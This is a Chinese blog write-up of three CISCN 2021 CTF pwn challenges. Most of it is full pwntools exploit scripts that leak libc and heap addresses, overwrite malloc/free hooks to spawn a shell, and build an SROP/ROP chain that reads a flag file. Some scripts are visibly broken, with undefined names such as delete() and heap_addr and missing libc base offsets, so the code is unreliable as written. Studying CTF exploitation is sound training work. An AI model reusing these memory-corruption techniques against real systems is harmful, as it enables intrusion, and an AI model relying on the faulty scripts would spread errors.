ciscn2021CTF国赛pwn解

最新推荐文章于 2024-03-22 22:37:11 发布
最新推荐文章于 2024-03-22 22:37:11 发布
阅读量1.2k 收藏 3
点赞数
分类专栏: CTF PWN 文章标签: 系统安全 安全 安全架构
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39948058/article/details/119944527
版权
CTF 同时被 2 个专栏收录
32 篇文章 2 订阅
订阅专栏
PWN
29 篇文章 0 订阅
订阅专栏

CTF 2021-05-18

总结:这次pwn的比赛难易程度尚可,菜菜的我在各位师傅的领导下勉勉强强做出了3道pwn,这三道pwn都不算太难,一道越界,越界pwny这道题确实把我搞吐了,后期卡在了ret的与数组的偏移,这个不会计算,在th1un师傅的领导下,才知道了如何计算,勉强做出来了,值得说的是数组越界在2021年比赛中出现的越来越频繁了,是真的频繁了,第二道pwn是一个堆,只不过index受到了限制,既然index受到了限制并不影响我们在同一个index构造多个chunk,所以这个题也是常规操作,对edit并没有要求那么严格,free掉直接写就可以了,第三道pwn,开启了沙盒,直接orw就可以了,只不过每个chunk限制在了0x78内,而orw和frame长度都超过了0x78,所以按照网上师傅的orw写法,采用分段写法即可
一、pwny这里采用scanf来触发malloc_hook,算好偏移,直接触发即可
exp:

#!/usr/bin/env python
# coding=utf-8
from pwn import *
sh=process('./pwny')
elf=ELF('./pwny')
libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
#context.log_level='debug'
sh.recvuntil('Your choice: ')
sh.sendline('2')
sh.sendline('256')
sh.sendline('2')
sh.sendline('256')
print str(proc.pidof(sh))
sh.sendline('1')
sh.send(p64(0xfffffffffffffffc))
sh.recvuntil('Result: ')
leak_addr=sh.recv(12)
leak_addr='0x'+leak_addr
print leak_addr
leak_addr=int(leak_addr, 16)
log.success('leak addr: '+hex(leak_addr))
libc_base=leak_addr-libc.sym['_IO_2_1_stderr_']
log.success('libc base: '+hex(libc_base))
sh.sendline('1')
sh.sendline(p64(0xfffffffffffffff5))
sh.recvuntil('Result: ')
pie_base=sh.recv(12)
pie_base='0x'+pie_base
pie_base=int(pie_base, 16)-0x202008
log.success('pie base: '+hex(pie_base))
all_base=libc_base-pie_base
log.success('base betweeen libc and pie: '+hex(all_base))
rce=libc_base+0x4f365
exit_hook=libc_base+0x619060+3840
evi=libc_base+libc.sym['environ']
def baopo1():
    sh.sendlineafter('choice: ','2')
    sh.sendlineafter('Index: ','-4')
    sh.sendline(p64(exit_hook))
def baopo2():
    sh.sendlineafter('choice: ','2')
    sh.sendlineafter('Index: ','-4')
    sh.sendline(p64(rce))
#sh.sendlineafter('choice: ','2')
#sh.sendlineafter('Index: ','-4')
#sh.sendline(p64(evi))
#sh.sendlineafter('choice: ','1')
#sh.sendlineafter('Index: ',p64(0xfffffffffffffffc))
sh.sendlineafter('choice: ','1')
sh.sendlineafter('Index: ',p64(((libc_base+libc.sym['__environ'])-(pie_base+0x202060))/8))
sh.recvuntil('Result: ')
stack_addr=int('0x'+sh.recv(12),16)
ret_addr=stack_addr+0x120
malloc_hook=libc_base+libc.sym['__malloc_hook']
print hex(malloc_hook)
ret_offset=(malloc_hook-pie_base+0x202060)/8
sh.sendlineafter('choice: ','2')
sh.sendlineafter('Index: ',str(ret_offset))
sh.sendline(p64(libc_base+0x10a45c))
sh.sendlineafter('choice: ','1'*0x600)
 
sh.interactive()

二、lonelwolf 正如前面总结所说,限制了index,但这并不影响我们利用直接打就可以了
exp:

from pwn import *
context.log_level = 'debug'
p = process("./lonelywolf")
#p=remote('124.71.229.73',22968)
elf = ELF("./lonelywolf")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
def add(size):
    p.sendlineafter("Your choice: ", "1")
    p.sendlineafter("Index: ", "0")
    p.sendlineafter("Size: ", str(size))
def edit(data):
    p.sendlineafter("Your choice: ","2")
    p.sendlineafter("Index: ", "0")
    p.sendlineafter("Content: ", data)
 
def show():
    p.sendlineafter("Your choice: ","3")
    p.sendlineafter("Index: ","0")
def free():
    p.sendlineafter("Your choice: ","4")
    p.sendlineafter("Index: ","0") 
add(0x70)
free()
edit(p64(0)+'\n')
free()
show()
p.recvuntil("Content: ")
addr_heap = u64(p.recv(6).ljust(8, '\x00')) - 0x7a0
edit(p64(addr_heap + 0x250))
add(0x70)
add(0x70)
edit(p64(0) + p64(0x461))
add(0x70)
delete()
edit(p64(0)+'\n')
free()
edit(p64(addr_heap + 0x260))
add(0x70)
add(0x70)
gdb.attach(p)
edit(p64(0)+'\n')
free()
show()
p.recvuntil("Content: ")
libc_base = u64(p.recv(6).ljust(8, '\x00')) - libc.sym["__malloc_hook"] - 0x70
add(0x70)
free()
edit(p64(0)+'\n')
free()
free_hook = libc_base + libc.sym["__free_hook"]
edit(p64(free_hook - 0x8))
add(0x70)
add(0x70)
system_addr = libc_base + libc.sym["system"]
payload = "/bin/sh\x00" + p64(system_addr)
edit(payload)
free()

三。silverwolf,这道题考察了srop,由于srop忘的差不多了都,跟着网上一些关于srop教程,硬调出来了
exp:

from pwn import *
context.log_level = 'debug'
context.arch = "amd64"
p = process("./silverwolf")
#p=remote('124.71.229.73',22968)
elf = ELF("./silverwolf")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
def add(size):
    p.sendlineafter("Your choice: ", "1")
    p.sendlineafter("Index: ", "0")
    p.sendlineafter("Size: ", str(size))
    return 
def edit(data):
    p.sendlineafter("Your choice: ","2")
    p.sendlineafter("Index: ", "0")
    p.sendlineafter("Content: ", data)
    return 
def show():
    p.sendlineafter("Your choice: ","3")
    p.sendlineafter("Index: ","0")
    return 
def delete():
    p.sendlineafter("Your choice: ","4")
    p.sendlineafter("Index: ","0")
    return
for i in range(24):
    add(0x61)
for i in range(8):
    add(0x70)
delete()
edit(p64(0)*2)
delete()
show()
p.recvuntil("Content: ")
addr_heap = u64(p.recv(6).ljust(8, '\x00')) - 0x7a0
print hex(addr_heap)
edit(p64(addr_heap+0x250))
add(0x70)
add(0x70)
edit(p64(0) + p64(0x461))
add(0x70)
delete()
edit(p64(0)*2)
delete()
edit(p64(addr_heap+0x260))
add(0x70)
add(0x70)
edit(p64(0)*2)
delete()
show()
p.recvuntil("Content: ")
libc_base = u64(p.recv(6).ljust(8, '\x00'))-0x3ebc40-0x60
setcontext=libc_base+libc.sym['setcontext']+53
free_hook=libc_base+libc.sym['__free_hook']
pop_rax=libc_base+0x0000000000043a78
pop_rdi=libc_base+0x000000000002155f
pop_rsi=libc_base+0x0000000000023e8a
pop_rdx=libc_base+0x0000000000001b96
 
pop_rdx_rsi_ret=libc_base+0x0000000000130889
syscall=libc_base+0x00000000000013c0
ret=libc_base+0x00000000000008aa
add(0x70)
delete()
edit(p64(0)*2)
delete()
edit(p64(free_hook))
add(0x70)
add(0x70)
edit(p64(setcontext))
sigframe = SigreturnFrame()
sigframe.rdi = addr_heap+0xed0+0x70
sigframe.rsi = 0
sigframe.rdx = 0
sigframe.rsp = addr_heap + 0xed0
sigframe.rbp = addr_heap + 0xed0
sigframe.rip = libc_base + 0x0000000000054da7 #mov eax,2;ret;
add(0x78)
delete()
edit(p64(0)*2)
delete()
edit(p64(addr_heap+0xcb0))
add(0x78)
add(0x78)
edit(str(sigframe)[:120])
add(0x78)
delete()
edit(p64(0))
delete()
edit(p64(addr_heap+0xcb0+0x78))
add(0x78)
add(0x78)
edit(str(sigframe[120:240]))
rop = p64(0x00000000000d2745+libc_base)
rop += p64(libc_base+0x00000000000215bf) #pop rdi
rop += p64(3)
rop += p64(libc_base+0x0000000000023eea) #pop rsi
rop += p64(heap_addr+0xed0+0x100)
rop += p64(libc_base+0x0000000000001b96) #pop rdx
rop += p64(0x100)
rop += p64(libc.symbols["read"])
rop += p64(libc_base+0x00000000000215bf)
rop += p64(1)
rop += p64(libc.symbols["write"])
rop += (0x70 - len(rop))*"\x00"
rop += "./flag\n"
add(0x78)
delete()
edit(p64(0)*2)
delete()
edit(p64(addr_heap+0xed0))
add(0x78)
add(0x78)
edit(rop)
add(0x78)
delete()
edit(p64(0)*2)
delete()
edit(p64(addr_heap+0xcb0))
add(0x78)
add(0x78)
delete()
p.interactive()

这次国赛的3道pwn题的质量都还可以,学到了不少,加油冲冲冲!!!

jsjsj11123
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[cstc2021]wp
Huamang的博客
05-06 2031
RGB 给了一堆rgb值,用python把他们写出来 from PIL import Image x = 11*2*2*2*2*2*2 y = 41 im = Image.new("RGB",(x,y)) file = open('code.txt') for i in range(0,x): for j in range(0,y): line = file.readline().rstrip("\n") rgb = line.split("#") im.putpixel(
CTF —— 网络安全大赛
Karka_的博客
03-20 1054
前言随着大数据、人工智能的发展,人们步入了新的时代,逐渐走上科技的巅峰。⚔科技是一把双刃剑,网络安全不容忽视,人们的隐私在大数据面前暴露无遗,账户被盗、资金损失、网络诈骗、隐私泄露,种种迹象表明,随着互联网的发展,网络安全需要引起人们的重视。互联网安全从其本质上来讲就是互联网上的信息安全。从广义来说,凡是涉及到互联网上信息的保密性、完整性、可用性、真实性和可控性的相关技术和理论都是网络安全的研究领域。‍ ‍ ‍ 网络安全需要一群网络安全技术人员的维护。而CTF,就是这些人技术竞技的比赛。
【Web】记录CISCN 2021 总决赛 ezj4va题目复现——AspectJWeaver
最新发布
uuzeray的博客
03-22 1211
这就是当年传说中的零题嘛😭,快做🤮了有了之前的经验,思路顺挺快的,中间不知道为啥一直一直一直一直报错,耗了一个下午总算打通考的是AspectJWeaver写恶意字节码到靶机上(本题jsp靶机不析),再去对其进行反序列化值得一提的是,本题并未在输入流进行黑名单过滤,事实上就是纯粹的原生反序列化,但因该jdk下无利用链可打,所以只能先迂回写入一个恶意类,再对这个恶意类进行反序列化操作,实在是巧思!
3月国内外CTF比赛时间汇总来了
dzqxwzoe的博客
03-07 3659
2023年,为更精准的帮助企业决网络安全人才缺口问题,国家网络空间安全人才培养基地正式推出“网络空间安全人才评定工程”,构建集网络空间安全专业人才发掘、培养、管理及输送为-体人才评定工程,人才评定囊括了安服、攻防、渗透、运维、重保等网络安全各大领域,通过人才评定,帮助国家和企业决人才需求问题,帮助网络安全人员决就业匹配问题,真正实现企业与网络安全人员的精准匹配。大赛的参赛对象为从事网络安全和设备数据采集分析、技术研究、软件开发及应用服务等领域的企事业单位、高等院校、科研机构、创新团队等。
CTF-2023一带一路金砖国家技能发展与技术创新大赛_网络安全在企业信息管理中的应用赛项线下总决赛-misc1-题-wp
weixin_63308767的博客
11-25 296
网络安全-CTF-MISC
((((CTF国赛题)))))
04-14
值得一看
2021全国职业技能大赛国赛ctf隐写资源
03-01
2021全国职业技能大赛国赛ctf隐写资源
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。这些挑战旨在测试各种安全技能,包括密码学、逆向工程、漏洞利用和网络分析等。 CTF题库通常由多个类别的挑战组成,例如Web安全、二...
安恒ctf pwn课件
10-06
安恒培训资料 栈溢出指的是程序向栈中某个局部变量中写入的字节数超过了这个变量本身所申 请的字节数,因而导致与其相邻的栈中的变量的值被改变。 Ø 程序能够向栈上写入数据。 Ø 写入的数据大小没有被良好地控制。...
2021CTF工业信息安全大赛第二场.rar
09-19
2021CTF工业信息安全大赛第二场题
啥也不会还想学PWN
weixin_67749304的博客
04-26 2754
本人真小白,真的0基础。 PWNCTF比赛中比较难的部分。首先要做的就是把基础知识打牢。 预备知识:C语言,汇编语言,Linux基础等。 栈,是一段特殊存取的内存。它好比一个盒子,数据好比一本本的书。先放进的书会被放在盒子的最底部,后放进的书会被放在盒子的最上面。这是栈的LIFO原则。 栈溢出。在存放数据的过程中,如果不注意检测数据的顶端是否超过栈的顶端,容易产生栈溢出。 一些汇编语言的常用指令:move A ,B 表示把寄存器B中的内容放到A当中;ret 返回主程序;call 调用一个子程序
强网杯2021 pwn 赛题析——babypwn
CoLin的pwn小屋
07-26 712
强网杯2021 pwn 赛题回顾——babypwn
2021年“莲城杯”网络安全大赛-PWN-pwn10(三血)
qq_43264813的博客
10-12 877
2021年“莲城杯”网络安全大赛-PWN-pwn10 题目名称:pwn10 题目内容:栈溢出。靶机:nc 183.129.189.60 10016 题目分值:100.0 题目难度:容易 相关附件:pwn10的附件.zip 题思路: 1.保护机制,静态链接,没pie 2.主要函数 3.做pwn要注意重点,输入一个长字符串,能把name冲掉,反正是个很大的数字,不用关注count是多少,反正够用。然后用不可寻址的地址找到偏移0x78,然后 rop syscall ```python #!/usr/bin/
[2023CISCN]国赛初赛WEB题目复现
qq_42585535的博客
10-23 396
最近几个月在学免杀,JAVA安全以及JS相关内容,导致CTF摆了很久,这次复现国赛题目就当做恢复训练了。
CTF国赛2023 - ukfc(四道逆向已下班)
qq_59700927的博客
05-28 2048
小明拿到了内网一个老旧服务的应用包,虽然有漏洞但是怎么利用他呢?这个函数中,%s读取字节无上限,导致缓冲区可以溢出到返回地址,由此我们着重进入这个函数并执行rop链。没有负数检查,直接减掉10*v9,那我们可以减掉一个大负数使得money大于100000。可以确定的是最后三位地址一定不会发生变化,那只需要对第四位爆破0xf位地址即可。有canary,原题:CSDN Canary学习(爆破Canary)程序是有pie的,我们直接修改下两位地址即可。先传入L文件,在传入R文件,然后。其中有flag,找到即可。
第十六届全国大学生信息安全竞赛创新实践能力赛-Misc-国粹
m0_63563528的博客
05-30 633
题思路:“题目”作为一个坐标轴,其中第一行是坐标轴的y轴,第二行是坐标轴的x轴,“a”和“k”是两两对应的坐标点,使用脚本匹配,将其坐标点画出来,获得flag。a.png 、k.png 是数量相等的一串麻将,题目.png是两行麻将,像是麻将种类的列举。这里记得手动创建一个保存图片切片的目录cuted,否则将找不到目录进而报错。
CISCN 2023 初赛 pwn——Shellwego 题
CoLin的pwn小屋
05-28 1574
CISCN 2023 初赛 pwn Shellwego题
2021第十四届全国大学生信息安全竞赛WP(CISCN)-- pwn部分
热门推荐
lifanxin的博客
05-17 1万+
CISCN_2021_WP概述ciscn_2021_lonelywolf总结 概述   作为学习不到一年的练习生,今年第一次参加国赛,本以为题目会比较温柔,但是最后只做出了一道pwn题,本来还有两道pwn题是有机会的,但还是缺少一些知识或者技巧吧,没做出来,然后就结束了。本次国赛pwn题出了一道arm 64位结构的,其余都是正常的linux下pwn题,使用libc-2.27.so,有一道考了沙箱机制。 ciscn_2021_lonelywolf   ciscn_2021_lonelywolf   libc-
ctf 简单pwn题资源
08-09
CTF 简单 PWN 题资源是指为了让参与网络攻防竞赛的选手提高他们在 PWN 领域的技能而准备的一些简单题目。这些题目通常要求选手对二进制代码进行逆向工程、利用漏洞并实施攻击,以获取题目提供的关键信息或获取系统控制权。 CTF 简单 PWN 题目的资源可以在各种在线平台上找到,例如 CTF 竞赛中常用的CTFd、pwnable.kr 和 picoCTF 等。这些平台提供了大量不同难度的 PWN 题目,从初学者到专业选手都能找到适合自己水平的题目。 此外,还有一些开源项目和教程可以帮助学习简单 PWN 题目的决方法。例如,pwntools 是一个功能强大的 Python 库,提供了一系列与二进制漏洞利用相关的工具和函数。还有一些博客和视频教程,介绍了从入门级到高级级别的 PWN 题技巧和常见漏洞的利用方式。 总结来说,CTF 简单 PWN 题目资源是指为了提高参赛者在 PWN 领域的技能而准备的一些简单的二进制漏洞利用题目。这些资源可以通过在线平台、开源项目和教程找到,对于想要在 CTF 竞赛中取得好成绩或提高网络安全技能的人们来说都是非常有价值的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值